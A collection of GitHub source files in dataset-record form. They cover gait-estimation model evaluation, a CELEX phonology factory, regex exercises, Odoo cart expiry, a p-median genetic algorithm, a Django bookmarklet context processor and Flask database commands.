plt.subplots(2,1,sharex=True,figsize=(10,6))\n axs[0].plot(plot_data_measured[:,0], plot_data_measured[:,5], label=r\"$foot position forward, model_{sim}$\")\n axs[0].fill_between(plot_data_measured[:,0], plot_data_measured[:,21],plot_data_measured[:,22], alpha=.5)\n axs[0].plot(plot_data_measured[:,0], plot_data_measured[:,11], '-o', label=r\"$foot position forward, meas_{sim}$\")\n # axs[0].plot(plot_data[:,0], HSDetected_vec_hardware*1e-1, label=r\"$HSDetected Hardware$\")\n axs[0].plot(plot_data[:,0], plot_data[:,7]*1e-1, 'r', label=r\"$HSDetected Sim$\")\n axs[0].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n\n axs[0].legend()\n\n axs[1].plot(plot_data_measured[:,0], plot_data_measured[:,6], label=r\"$foot position up, model_{sim}$\")\n axs[1].fill_between(plot_data_measured[:,0], plot_data_measured[:,23],plot_data_measured[:,24], alpha=.5)\n axs[1].plot(plot_data_measured[:,0], plot_data_measured[:,12], '-o', label=r\"$foot position up, meas_{sim}$\")\n # axs[1].plot(plot_data[:,0], HSDetected_vec_hardware*1e-1, label=r\"$HSDetected hardware$\")\n 
axs[1].plot(plot_data[:,0], plot_data[:,7]*1e-1, 'r', label=r\"$HSDetected Sim$\")\n axs[1].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n axs[1].legend()\n\n print(\"this is done (plot foot pos)\")\n\n if not True and DO_PLOTS:\n fig, axs = plt.subplots(2,1,sharex=True,figsize=(10,6))\n axs[0].plot(plot_data_measured[:,0], plot_states[:,0],'-o', label=r\"$state 1$\")\n axs[0].plot(plot_data_measured[:,0], plot_states[:,1],'-o', label=r\"$state 2$\")\n axs[0].set_ylabel('Foot Forward')\n axs[0].legend()\n\n\n axs[1].plot(plot_data_measured[:,0], plot_states[:,2],'-o', label=r\"$state 1$\")\n axs[1].plot(plot_data_measured[:,0], plot_states[:,3],'-o', label=r\"$state 2$\")\n axs[1].set_ylabel('Foot Up')\n axs[1].legend()\n\n\n\n if not True and DO_PLOTS:\n\n fig, axs = plt.subplots(sharex=True,figsize=(10,6))\n axs.plot(plot_data_measured[:,15], plot_data_measured[:,27])\n axs.set_xlabel('Foot pos forward')\n axs.set_ylabel('Foot pos Up')\n\n fig, axs = plt.subplots(sharex=True,figsize=(10,6))\n axs.plot(plot_data_measured[:,0], plot_data_measured[:,28],label='arctan angle')\n axs.set_xlabel('Time')\n\n\n #PLOT FOOT IMU ACCEL\n if True and DO_PLOTS:\n fig, axs = plt.subplots(4,1,sharex=True,figsize=(10,6))\n\n axs[0].plot(timeSec_vec_hardware, heelAccForward_meas_fromDeltaVelocity_vec_hardware, label=r\"$heel acc from delta vel$\")\n\n axs[0].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[0].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e1,'k', label=r\"$isOverriding sim$\")\n\n axs[1].plot(timeSec_vec_hardware, heelAccSide_meas_fromDeltaVelocity_vec_hardware, label=r\"$heel side from delta vel$\")\n\n axs[1].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[1].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n\n axs[2].plot(timeSec_vec_hardware, heelAccUp_meas_fromDeltaVelocity_vec_hardware, label=r\"$heel up from delta vel$\")\n\n axs[2].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[2].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n\n axs[3].plot(timeSec_vec_hardware, heelAccNorm_meas_fromDeltaVelocity_vec_hardware, label=r\"$heel accel norm$\")\n axs[3].plot(plot_data[:,0], plot_data[:,7]*1e1, 'r', label=r\"$HSDetected Sim$\")\n axs[3].plot(plot_data[:,0], plot_data_HPEKF[:,1]*1e-1,'k', label=r\"$isOverriding sim$\")\n\n\n if not True and DO_PLOTS:\n fig, axs = plt.subplots(sharex=True,figsize=(10,6))\n axs.plot(timeSec_vec_hardware[1:], dt_vec_hardware, label=r\"$dt$\")\n\n phase_sim_ekf = plot_data[:,1].reshape(-1,1)\n speed_sim_ekf = plot_data[:,2].reshape(-1,1) * plot_data[:,3].reshape(-1,1)\n incline_sim_ekf = plot_data[:,4].reshape(-1,1)\n\n phase_sim_tbe = plot_data_TBE[:,1].reshape(-1,1)\n\n return phase_sim_ekf, speed_sim_ekf, incline_sim_ekf, phase_sim_tbe\n\n\ndef sim_other_models_over_multiple_files(filenames, vicon_filenames):\n \"\"\"This function runs the simulation of the TBE and EKF over multiple paired exoboot and vicon filenames\n that have been exported using the processing scripts for each participant\n e.g. 
filenames[i] corresponds to the same trial as vicon_filenames[i]\n\n Args:\n filenames (list): an ordered list of the exoboot filenames\n vicon_filenames (list): an ordered list of the corresponding vicon filenames\n \"\"\" \n phase_rmses_ekf = []\n speed_rmses_ekf = []\n incline_rmses_ekf = []\n phase_rmses_tbe = []\n\n phase_rmses_ekf_ss = []\n speed_rmses_ekf_ss = []\n incline_rmses_ekf_ss = []\n phase_rmses_tbe_ss = []\n\n phase_rmses_ekf_nss = []\n speed_rmses_ekf_nss = []\n incline_rmses_ekf_nss = []\n phase_rmses_tbe_nss = []\n\n start_idx = 200\n\n\n for i, vicon_filename in enumerate(vicon_filenames):\n\n df = pd.read_csv(vicon_filename)\n # print(df.head())\n\n dt = df['dt'].to_numpy()\n phase_ground_truth = df['phase_ground_truth'].to_numpy().reshape(-1,1)\n speed_ground_truth = df['speed_ground_truth'].to_numpy().reshape(-1,1)\n incline_ground_truth = df['incline_ground_truth'].to_numpy().reshape(-1,1)\n stairs_ground_truth = df['stairs_ground_truth'].to_numpy().reshape(-1,1)\n\n phase_hardware = df['phase_hardware'].to_numpy().reshape(-1,1)\n speed_hardware = df['speed_hardware'].to_numpy().reshape(-1,1)\n incline_hardware = df['incline_hardware'].to_numpy().reshape(-1,1)\n stairs_hardware = df['stairs_hardware'].to_numpy().reshape(-1,1)\n\n is_steady_state = df['is_steady_state_ground_truth'].to_numpy().reshape(-1,1)\n phase_events = df['phase_events_ground_truth'].to_numpy().reshape(-1,1)\n\n predictions = np.hstack((phase_hardware, speed_hardware, incline_hardware, stairs_hardware))\n true_labels = np.hstack((phase_ground_truth, speed_ground_truth, incline_ground_truth, stairs_ground_truth))\n\n #only consider the predictions starting from start_idx\n predictions = predictions[start_idx:,:]\n true_labels = true_labels[start_idx:,:]\n is_steady_state = is_steady_state[start_idx:,:]\n\n #reshape phase events to be 1D so np.nonzeros returns a 1D array\n phase_events = phase_events[start_idx:,:].reshape(-1)\n\n \n #extract raw full data from exoboot\n data = np.loadtxt(filenames[i], delimiter=',')\n data = data[start_idx:,:]\n time_exo = data[:,0]\n dts_exo = np.diff(time_exo)\n dts_exo = np.insert(dts_exo,0,dts_exo[0])\n\n #SET UP SUBJECT LEG LENGTH\n SUBJECT_LEG_LENGTH = 0.935 #AB01\n torque_profile_path = '../../torque_profile/torque_profile_coeffs.csv'\n gait_model_covar_path = '../../old_ekf_funcs/covar_fourier_normalizedsL_linearsL.csv'\n gait_model_path = '../../old_ekf_funcs/gaitModel_fourier_normalizedsL_linearsL.csv'\n\n\n\n \n phase_event_idxs = np.nonzero(phase_events == 1)\n #insert idxs for beginning and end of trial\n phase_event_idxs = np.insert(phase_event_idxs,0,0)\n phase_event_idxs = np.append(phase_event_idxs,len(phase_events)-1)\n\n #extract number of phase events\n num_phase_events = len(phase_event_idxs)\n # print(num_phase_events)\n # print(phase_event_idxs)\n # input()\n\n #extract only the data that is moving for TBE\n tbe_mask = speed_ground_truth[start_idx:,:].reshape(-1) >= 0.05\n tbe_idxs = np.argwhere(tbe_mask)\n # print(tbe_idxs)\n # print(len(tbe_idxs))\n # print(tbe_idxs[0], tbe_idxs[-1])\n data_tbe = data[tbe_mask,:]\n #overwrite the time vector of the data at position zero\n dts_exo_tbe = dts_exo[tbe_mask]\n time_exo_tbe = np.cumsum(dts_exo_tbe)\n data_tbe[:,0] = time_exo_tbe\n true_labels_tbe = true_labels[tbe_mask,:]\n is_steady_state_tbe = is_steady_state[tbe_mask,:]\n\n #remove the phase events that aren't in the range of the TBE data\n phase_events_tbe = phase_events[tbe_mask]\n phase_event_idxs_tbe = np.nonzero(phase_events_tbe == 
1)[0]\n\n #extract number of phase events for tbe\n num_phase_events_tbe = len(phase_event_idxs_tbe)\n\n # print(phase_event_idxs_tbe)\n\n #extract data that isn't stairs and is moving for old EKF\n ekf_mask = np.logical_and( (np.abs(stairs_ground_truth[start_idx:,:].reshape(-1)) <= 0.5), (speed_ground_truth[start_idx:,:].reshape(-1) >= 0.05)) \n ekf_idxs = np.argwhere(ekf_mask)\n # print(ekf_idxs)\n # print(len(ekf_idxs))\n # print(ekf_idxs[0], ekf_idxs[-1])\n data_ekf = data[ekf_mask,:]\n #overwrite the time vector of the data at position zero\n dts_exo_ekf = dts_exo[ekf_mask]\n time_exo_ekf = np.cumsum(dts_exo_ekf)\n data_ekf[:,0] = time_exo_ekf\n true_labels_ekf = true_labels[ekf_mask,:]\n is_steady_state_ekf = is_steady_state[ekf_mask,:]\n\n #remove the phase events that aren't in the range of the EKF data\n phase_events_ekf = phase_events[ekf_mask]\n phase_event_idxs_ekf = np.nonzero(phase_events_ekf == 1)[0]\n # print(phase_event_idxs_ekf)\n #extract number of phase events for tbe\n num_phase_events_ekf = len(phase_event_idxs_ekf)\n\n # input()\n\n phase_sim_ekf, speed_sim_ekf, incline_sim_ekf, _ = sim_other_models(data_ekf, SUBJECT_LEG_LENGTH, torque_profile_path, gait_model_covar_path, gait_model_path, DO_PLOTS=not True)\n _, _, _, phase_sim_tbe = sim_other_models(data_tbe, SUBJECT_LEG_LENGTH, torque_profile_path, gait_model_covar_path, gait_model_path, DO_PLOTS=not True)\n\n if not True:\n fig, axs = plt.subplots(3,1)\n axs[0].plot(phase_sim_ekf,'r',label='EKF')\n axs[0].plot(true_labels_ekf[:,0],'b',label='ground truth')\n axs[0].plot(phase_events_ekf,'k',label='phase_events_ekf')\n axs[0].legend()\n axs[1].plot(speed_sim_ekf,'r')\n axs[1].plot(true_labels_ekf[:,1],'b')\n\n axs[2].plot(incline_sim_ekf,'r')\n axs[2].plot(true_labels_ekf[:,2],'b')\n\n fig, axs = plt.subplots()\n axs.plot(phase_sim_tbe,'r',label='TBE')\n axs.plot(true_labels_tbe[:,0],'b',label='ground truth')\n axs.plot(phase_events_tbe,'k',label='phase_events_tbe')\n axs.legend()\n\n plt.show()\n\n # print(len(speed_sim_ekf))\n #run through ekf data\n for i in range(num_phase_events_ekf-1):\n current_idx = phase_event_idxs_ekf[i]\n next_idx = phase_event_idxs_ekf[i+1]\n\n # print(f'current_idx: {current_idx}')\n # print(f'next_idx: {next_idx}')\n\n phase_sim_ekf_step = phase_sim_ekf[current_idx:next_idx,:].reshape(-1)\n speed_sim_ekf_step = speed_sim_ekf[current_idx:next_idx,:].reshape(-1)\n incline_sim_ekf_step = incline_sim_ekf[current_idx:next_idx,:].reshape(-1)\n\n true_labels_step = true_labels_ekf[current_idx:next_idx,:]\n\n # determine if we're steady state\n is_steady_state_ekf_step = is_steady_state_ekf[current_idx:next_idx].flatten()\n is_steady_state_ekf_step_bool = np.average(is_steady_state_ekf_step) >= 0.5\n # print(is_steady_state_ekf_step.shape)\n # print(is_steady_state_ekf_step)\n # print(is_steady_state_ekf_step_bool)\n\n\n # input()\n\n if not True:\n fig, axs = plt.subplots(3,1)\n axs[0].plot(phase_sim_ekf_step,'r',label='EKF')\n axs[0].plot(true_labels_step[:,0],'b',label='ground truth')\n axs[0].legend()\n axs[1].plot(speed_sim_ekf_step,'r')\n axs[1].plot(true_labels_step[:,1],'b')\n\n axs[2].plot(incline_sim_ekf_step,'r')\n axs[2].plot(true_labels_step[:,2],'b')\n \n # plt.show()\n\n phase_rmse_step = np.sqrt(np.mean(phase_dist(phase_sim_ekf_step, true_labels_step[:,0])**2))\n speed_rmse_step = np.sqrt(np.mean((speed_sim_ekf_step - true_labels_step[:,1])**2))\n incline_rmse_step = np.sqrt(np.mean((incline_sim_ekf_step - true_labels_step[:,2])**2))\n\n\n #update RMSE overall vector\n 
phase_rmses_ekf.append(phase_rmse_step)\n speed_rmses_ekf.append(speed_rmse_step)\n incline_rmses_ekf.append(incline_rmse_step)\n\n # handle steady state/transitory specific errors\n if is_steady_state_ekf_step_bool:\n phase_rmses_ekf_ss.append(phase_rmse_step)\n speed_rmses_ekf_ss.append(speed_rmse_step)\n incline_rmses_ekf_ss.append(incline_rmse_step)\n\n else:\n phase_rmses_ekf_nss.append(phase_rmse_step)\n speed_rmses_ekf_nss.append(speed_rmse_step)\n incline_rmses_ekf_nss.append(incline_rmse_step)\n\n # input()\n\n #run through tbe data\n for i in range(num_phase_events_tbe-1):\n current_idx = phase_event_idxs_tbe[i]\n next_idx = phase_event_idxs_tbe[i+1]\n\n # print(f'current_idx: {current_idx}')\n # print(f'next_idx: {next_idx}')\n\n phase_sim_tbe_step = phase_sim_tbe[current_idx:next_idx,:].reshape(-1)\n true_labels_step = true_labels_tbe[current_idx:next_idx,:]\n\n # determine if we're steady state\n is_steady_state_tbe_step = is_steady_state_tbe[current_idx:next_idx].flatten()\n is_steady_state_tbe_step_bool = np.average(is_steady_state_tbe_step) >= 0.5\n\n # print(speed_sim_tbe_step)\n phase_rmse_step = np.sqrt(np.mean(phase_dist(phase_sim_tbe_step, true_labels_step[:,0])**2))\n\n #update RMSE overall vector\n phase_rmses_tbe.append(phase_rmse_step)\n\n # handle steady state/transitory specific errors\n if is_steady_state_tbe_step_bool:\n phase_rmses_tbe_ss.append(phase_rmse_step)\n\n else:\n phase_rmses_tbe_nss.append(phase_rmse_step)\n\n\n # input()\n\n\n phase_rmses_ekf = np.array(phase_rmses_ekf)\n speed_rmses_ekf = np.array(speed_rmses_ekf)\n incline_rmses_ekf = np.array(incline_rmses_ekf)\n phase_rmses_tbe = np.array(phase_rmses_tbe)\n\n phase_rmses_ekf_ss = np.array(phase_rmses_ekf_ss)\n speed_rmses_ekf_ss = np.array(speed_rmses_ekf_ss)\n incline_rmses_ekf_ss = np.array(incline_rmses_ekf_ss)\n phase_rmses_tbe_ss = np.array(phase_rmses_tbe_ss)\n\n phase_rmses_ekf_nss = np.array(phase_rmses_ekf_nss)\n speed_rmses_ekf_nss = np.array(speed_rmses_ekf_nss)\n incline_rmses_ekf_nss = np.array(incline_rmses_ekf_nss)\n phase_rmses_tbe_nss = np.array(phase_rmses_tbe_nss)\n\n print('EKF')\n print(phase_rmses_ekf)\n print('Overall')\n print(f'phase_loss_avg: {np.mean(phase_rmses_ekf)} +- {np.std(phase_rmses_ekf)}')\n print(f'speed_loss_avg: {np.mean(speed_rmses_ekf)} +- {np.std(speed_rmses_ekf)}')\n print(f'incline_loss_avg: {np.mean(incline_rmses_ekf)} +- {np.std(incline_rmses_ekf)}')\n\n print('Steady State')\n print(f'phase_loss_avg: {np.mean(phase_rmses_ekf_ss)} +- {np.std(phase_rmses_ekf_ss)}')\n print(f'speed_loss_avg: {np.mean(speed_rmses_ekf_ss)} +- {np.std(speed_rmses_ekf_ss)}')\n print(f'incline_loss_avg: {np.mean(incline_rmses_ekf_ss)} +- {np.std(incline_rmses_ekf_ss)}')\n\n print('Transitory')\n print(f'phase_loss_avg: {np.mean(phase_rmses_ekf_nss)} +- {np.std(phase_rmses_ekf_nss)}')\n print(f'speed_loss_avg: {np.mean(speed_rmses_ekf_nss)} +- {np.std(speed_rmses_ekf_nss)}')\n print(f'incline_loss_avg: {np.mean(incline_rmses_ekf_nss)} +- {np.std(incline_rmses_ekf_nss)}')\n print()\n\n print('TBE')\n print('Overall')\n print(f'phase_loss_avg: {np.mean(phase_rmses_tbe)} +- {np.std(phase_rmses_tbe)}')\n print('Steady State')\n print(f'phase_loss_avg: {np.mean(phase_rmses_tbe_ss)} +- {np.std(phase_rmses_tbe_ss)}')\n print('Transitory')\n print(f'phase_loss_avg: {np.mean(phase_rmses_tbe_nss)} +- {np.std(phase_rmses_tbe_nss)}')\n\n\n 
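# A possible extension (sketch only, not in the original script): persist the per-step\n    # RMSE lists for later cross-model comparison; the filename here is just an example.\n    # pd.DataFrame({'phase_rmse_ekf': phase_rmses_ekf}).to_csv('ekf_rmses.csv', index=False)\n    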
print()","repo_name":"leotolstoy/ml-gait-estimation","sub_path":"sim_other_models.py","file_name":"sim_other_models.py","file_ext":"py","file_size_in_byte":37760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3902520950","text":"'''\nCreated on Jun 2, 2014\n\n@author: dbhage\n\nFactory to create Celex objects\n'''\n\nimport os\n\nfrom celex.phonology.english_celex import EnglishCelex\nfrom celex.phonology.dutch_celex import DutchCelex\nfrom celex.phonology.german_celex import GermanCelex\n\ndef build_celex(celex_path, language, version):\n '''\n Build the Celex2 dictionary.\n Phoneme translations will always be returned as a list - See version for format.\n \n @param celex_path: Path to the celex2 directory\n @type celex_path: str\n \n @param language: 0 - English, 1 - German, 2 - Dutch\n @type language: int\n \n @param version: 0 - leading apostrophe removed, 1 - split on hyphens, 2 - all characters listed separately\n @type version: int\n \n @return: Celex object built according to parameters passed\n @rtype: Celex obj\n \n @raise ValueError: raises ValueError if celex_path parameter is invalid or language or version out of range\n '''\n check_path(celex_path)\n\n if language not in [0,1,2]:\n raise ValueError(\"Language not in range. Expected 0, 1 or 2, Found:\" + str(language))\n\n if version not in [0,1,2]:\n raise ValueError(\"Version not in range. Expected 0, 1 or 2, Found:\" + str(version))\n\n if language == 0:\n celex = EnglishCelex()\n elif language == 1:\n celex = GermanCelex()\n else:\n celex = DutchCelex()\n \n celex.build(celex_path, version)\n \n return celex\n\ndef check_path(celex_path):\n '''\n Check if the path to celex2 exists\n \n @param celex_path: the path to the celex2 root directory\n @type celex_path: str\n \n @raise ValueError: raised if celex_path does not exist\n '''\n if not os.path.exists(celex_path):\n raise ValueError(\"Celex Path \\'\" + celex_path + \"\\' does not exist.\")","repo_name":"dbhage/pycelex-phonology","sub_path":"celex/factory/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"17196277682","text":"import re\nimport pandas as pd\n\n\ndef is_vowel(s):\n \"\"\"Is it a vowel?\n Args:\n s: any string\n Out:\n True if s is a vowel (bool)\n \"\"\"\n return bool(re.search(r'^[aeiou]$', s.lower()))\n\n\ndef is_valid_user(s):\n \"\"\"Is string a good username?\n Args:\n s: any string\n Out:\n True if s is lowercase letters, numbers, and _\n and < 32 chars (bool)\n \"\"\"\n return bool(re.search('^[a-z][a-z0-9_]{,31}$', s))\n\n \ndef capture_numbers(lst):\n \"\"\"Capture phone numbers\n Args:\n list o strimgs\n Out:\n list of phone numbers\n \"\"\"\n phone_regex = re.compile('''^\n (?P\\+\\d+)?\n \\D*?\n (?P\\d{3})?\n \\D*?\n (?P\\d{3})\n \\D*?\n (?P\\d{4})\n \\D*\n $''', re.VERBOSE)\n lst.str.extract(phone_regex)\n \n return re.search(r'', lst).groups()\n \nphone = ['(210) 867 5309','+1 210.867.5309','867-5309','210-867-5309']\nprint(is_valid_user(phone))\n\n\ndef change_dates(lst):\n \"\"\"Standardize dates phone numbers\n Args:\n list of dates\n Out:\n list of Y-M-D dates \n \"\"\"\n r = r'(\\d+)/(\\d+)/(\\d+)'\n return [re.sub(r, r'20\\3-\\1-\\2',date) for date in lst]\n \ndates = ['02/04/19','02/05/19','02/06/19','02/07/19']\nprint(change_dates(dates))\n\n\ndef parse_logs(logs):\n \"\"\"Extract parts of logfiles.\n Args:\n list of logfiles\n Out:\n 
\n\n\ndef change_dates(lst):\n    \"\"\"Standardize dates\n    Args:\n        lst: list of dates\n    Out:\n        list of Y-M-D dates \n    \"\"\"\n    r = r'(\\d+)/(\\d+)/(\\d+)'\n    return [re.sub(r, r'20\\3-\\1-\\2',date) for date in lst]\n    \ndates = ['02/04/19','02/05/19','02/06/19','02/07/19']\nprint(change_dates(dates))\n\n\ndef parse_logs(logs):\n    \"\"\"Extract parts of logfiles.\n    Args:\n        logs: list of logfile lines\n    Out:\n        list of dicts\n    \"\"\"\n    r = r'''^\n    (?P<method>GET|POST)\n    \\s\n    (?P<path>/[/\\w\\-\\?=]+)\n    \\s\n    \\[(?P<timestamp>.+)\\]\n    \\s\n    (?P<http_version>HTTP/\\d+\\.\\d+)\n    \\s\n    \\{(?P<status_code>\\d+)\\}\n    \\s\n    (?P<bytes_sent>\\d+)\n    \\s\n    \"(?P<user_agent>.+)\"\n    \\s\n    (?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+)\n    $'''\n    return [re.search(r, l, re.VERBOSE).groupdict() for l in logs]\n\nlogs = ['GET /api/v1/sales?page=86 [16/Apr/2019:193452+0000] HTTP/1.1 {200} 510348 \"python-requests/2.21.0\" 97.105.19.58',\n        'POST /users_accounts/file-upload [16/Apr/2019:193452+0000] HTTP/1.1 {201} 42 \"User-Agent: Mozilla/5.0 (X11; Fedora; Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\" 97.105.19.58',\n        'GET /api/v1/items?page=3 [16/Apr/2019:193453+0000] HTTP/1.1 {429} 3561 \"python-requests/2.21.0\" 97.105.19.58']\nprint(parse_logs(logs))","repo_name":"konstanzer/data-analysis-exercises","sub_path":"nlp-exercises/regex-ex.py","file_name":"regex-ex.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"40686904427","text":"from datetime import timedelta\n\nfrom odoo import _, api, fields, models\nfrom odoo.osv import expression\n\n\nclass Website(models.Model):\n    _inherit = \"website\"\n\n    cart_expire_delay = fields.Float(\n        string=\"Expire Delay\",\n        default=0.0,\n        help=\"Automatically cancel website orders after the given time.\\n\"\n        \"Set to 0 to disable this feature.\",\n    )\n\n    def _get_cart_expire_delay_domain(self):\n        self.ensure_one()\n        expire_date = fields.Datetime.now() - timedelta(hours=self.cart_expire_delay)\n        return [\n            (\"website_id\", \"=\", self.id),\n            (\"state\", \"in\", [\"draft\", \"sent\"]),\n            (\"write_date\", \"<=\", expire_date),\n        ]\n\n    @api.model\n    def _scheduler_website_expire_cart(self):\n        websites = self.search([(\"cart_expire_delay\", \">\", 0)])\n        if not websites:\n            return True\n        # Get all carts to expire\n        carts_to_expire_domains = [\n            website._get_cart_expire_delay_domain() for website in websites\n        ]\n        carts_to_expire = self.env[\"sale.order\"].search(\n            expression.OR(carts_to_expire_domains)\n        )\n        # Expire carts\n        for cart in carts_to_expire:\n            cart.message_post(body=_(\"Cart expired\"))\n        carts_to_expire._action_cancel()\n","repo_name":"OCA/e-commerce","sub_path":"website_sale_cart_expire/models/website.py","file_name":"website.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"31"}
+{"seq_id":"35085918071","text":"from math import factorial, ceil, log\nfrom random import randint, sample\nfrom .cost import cost, parallel_cost\nimport concurrent.futures as cf\n\n\nclass Population:\n\n    def __init__(self, p_value, grid, distance_mx):\n        \"\"\"\n        Initializes population's parameters (Alp et al. 
(2003), 4.3)\n Args:\n p_value: The p-value of the problem.\n grid: A list of MapBox objects.\n distance_mx: A NumPy array.\n \"\"\"\n\n self.n_supply = len(distance_mx) - len(distance_mx[0])\n self.p_value = p_value\n\n # If selecting less locations than supply points, choose among supply points.\n if self.n_supply >= p_value:\n self.n = self.n_supply\n self.solution = \"supply\"\n # If selecting more locations than (non-zero) supply points, pick all supply points and choose the rest.\n elif self.n_supply > 0:\n self.n = len(grid)\n self.p_value -= self.n_supply\n self.solution = \"mixed\"\n # Otherwise choose only demand locations\n else:\n self.n = len(grid)\n self.solution = \"demand\"\n\n self.n_choose_p = factorial(self.n) / (factorial(self.p_value) * (factorial(self.n - self.p_value)))\n self.density = ceil(self.n / self.p_value)\n self.k = max(2, (ceil((self.n / 100) * (log(self.n_choose_p) / self.density))))\n self.stop = ceil(self.n * (self.p_value ** (1 / 2)))\n self.candidates = None\n self.best = None\n self.worst = None\n self.costs = {}\n self.grid = grid\n self.distances = distance_mx\n\n def initialize(self):\n \"\"\"\n Performs initial draw of candidates (Alp et al. (2003), 4.4)\n Candidate cost, best (least expensive) and worst (most expensive) candidates are computed.\n \"\"\"\n k_groups = []\n for i in range(1, self.k + 1):\n k_group = []\n start = 0\n end = self.n\n step = i\n for j in range(i):\n k_group.extend(list(range(start, end, step)))\n start += 1\n while len(k_group) % self.p_value > 0:\n random_number = randint(0, self.n - 1)\n if random_number not in k_group[-(len(k_group) % self.p_value):]:\n k_group.append(random_number)\n k_groups.extend(k_group)\n if self.solution == \"supply\":\n offset = len(self.grid)\n k_groups = [k + offset for k in k_groups]\n self.candidates = [k_groups[i:i + self.p_value] for i in range(0, len(k_groups), self.p_value)]\n elif self.solution == \"mixed\":\n offset = len(self.grid)\n all_supply = list(range(offset, offset + self.n_supply))\n self.candidates = [k_groups[i:i + self.p_value] for i in range(0, len(k_groups), self.p_value)]\n for item in self.candidates:\n item.extend(all_supply)\n else:\n self.candidates = [k_groups[i:i + self.p_value] for i in range(0, len(k_groups), self.p_value)]\n\n self.candidates = [frozenset(c) for c in self.candidates]\n\n self.costs = {c: cost(c, self.grid, self.distances) for c in self.candidates}\n self.best = min(self.candidates, key=lambda t: self.costs[t])\n self.worst = max(self.candidates, key=lambda t: self.costs[t])\n\n def get_parents(self):\n \"\"\"\n Randomly draw two candidates from the current population. (Alp et al. (2003), 4.5)\n\n Returns: list\n \"\"\"\n return sample(self.candidates, 2)\n\n def get_child(self, parents):\n \"\"\"\n Create a child (Alp et al. 
(2003), 4.6)\n\n Args:\n parents: A pair of solutions (list)\n\n Returns:\n A -perhaps- new solution (frozenset)\n \"\"\"\n draft_child = set(parents[0] | parents[1])\n removable_genes = set(parents[0] ^ parents[1])\n\n p = self.p_value + self.n_supply if self.solution == \"mixed\" else self.p_value\n\n while len(draft_child) > p:\n gene_to_remove = min(removable_genes, key=lambda t: cost(draft_child - {t}, self.grid, self.distances))\n draft_child.discard(gene_to_remove)\n removable_genes.discard(gene_to_remove)\n return frozenset(draft_child)\n\n def get_children(self):\n parents = self.get_parents()\n child = self.get_child(parents)\n return child\n\n def update_candidates(self, child):\n \"\"\"\n Updates the current population as follows. If the the child's cost is larger than that of the worst's candidate,\n then the former is added to the population and the latter removed. If in addition the child's cost is the new\n best candidate/solution, the stop counter is reset. (Alp et al. (2003), 4.8 and 4.9)\n\n Args:\n child: A solution (frozenset)\n \"\"\"\n if child not in self.candidates:\n child_cost = cost(child, self.grid, self.distances)\n if child_cost < self.costs[self.worst]:\n if child_cost < self.costs[self.best]:\n self.stop = ceil(self.n * (self.p_value ** (1 / 2))) + 1\n self.candidates.remove(self.worst)\n self.candidates.append(child)\n self.costs[child] = child_cost\n self.worst = max(self.candidates, key=lambda t: self.costs[t])\n self.best = min(self.candidates, key=lambda t: self.costs[t])\n self.stop -= 1\n","repo_name":"ibadkureshi/tnk-locationallocation","sub_path":"pmedian/functions/p_median/Population.py","file_name":"Population.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"75066658966","text":"\nfrom django.contrib.sites.models import Site\nfrom django.core.urlresolvers import reverse\n\n\ndef context(request):\n site = Site.objects.get_current(),\n return {\n 'site': site[0],\n 'bookmarklet': ''.join([ \"javascript:window.location='http://\",\n site[0].domain, reverse('add'),\n \"?url='+window.location\" ])\n }\n","repo_name":"bvanslyke/bookmarksapp","sub_path":"bookmarks/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2751690442","text":"import os\nimport sys\nimport json\nimport sqlite3\nimport time\nimport shutil\nimport hashlib\nfrom pathlib import Path\n \nimport dataset\nimport colored\nimport click\nfrom flask import current_app, g\nfrom flask.cli import with_appcontext\n\nfrom . 
import AppDB\n\ndef check_file(f):\n if isinstance(f, str):\n f = Path(f)\n return f.is_file() and not f.name.startswith('.') and os.path.getsize(f) > 0\n else: #already a file object\n return f.is_file() and not f.name.startswith('.') and os.path.getsize(f) > 0\n\ndef check_dir(d):\n if isinstance(d, str):\n d = Path(d)\n return d.is_dir() and not d.name.startswith('.') and not d.is_symlink() and not d.is_mount()\n else: #already a dir object\n return d.is_dir() and not d.name.startswith('.')\n\ndef close_db_command(e = None):\n \"\"\"Close the database\"\"\"\n AppDB.close_db(e)\n\n@click.command('init-db')\n@with_appcontext\ndef init_db_command():\n \"\"\"Clear the existing data and create new tables.\"\"\"\n AppDB.init_db()\n click.echo('Initialized the database: %s' % (g.DATABASE_PATH))\n\n@click.command('drop-db')\n@with_appcontext\ndef drop_db_command():\n \"\"\"Drop the database file, if it exists.\"\"\"\n AppDB.drop_db()\n click.echo('Deleted the database')\n\n@click.command('db-ls')\n@click.option('--files/--no-files', default=True)\n@click.option('--dirs/--no-dirs', default=False)\n@click.option('--hashes/--no-hashes', default=False)\n@with_appcontext\ndef db_ls_command(files = True, dirs = False, hashes = False):\n \"\"\"List entries in the database.\"\"\"\n db, ds = AppDB.get_db()\n\n if files:\n for d in ds['files'].all():\n Node = AppDB.FileNode(d)\n click.echo('%s' % (Node) )\n\n 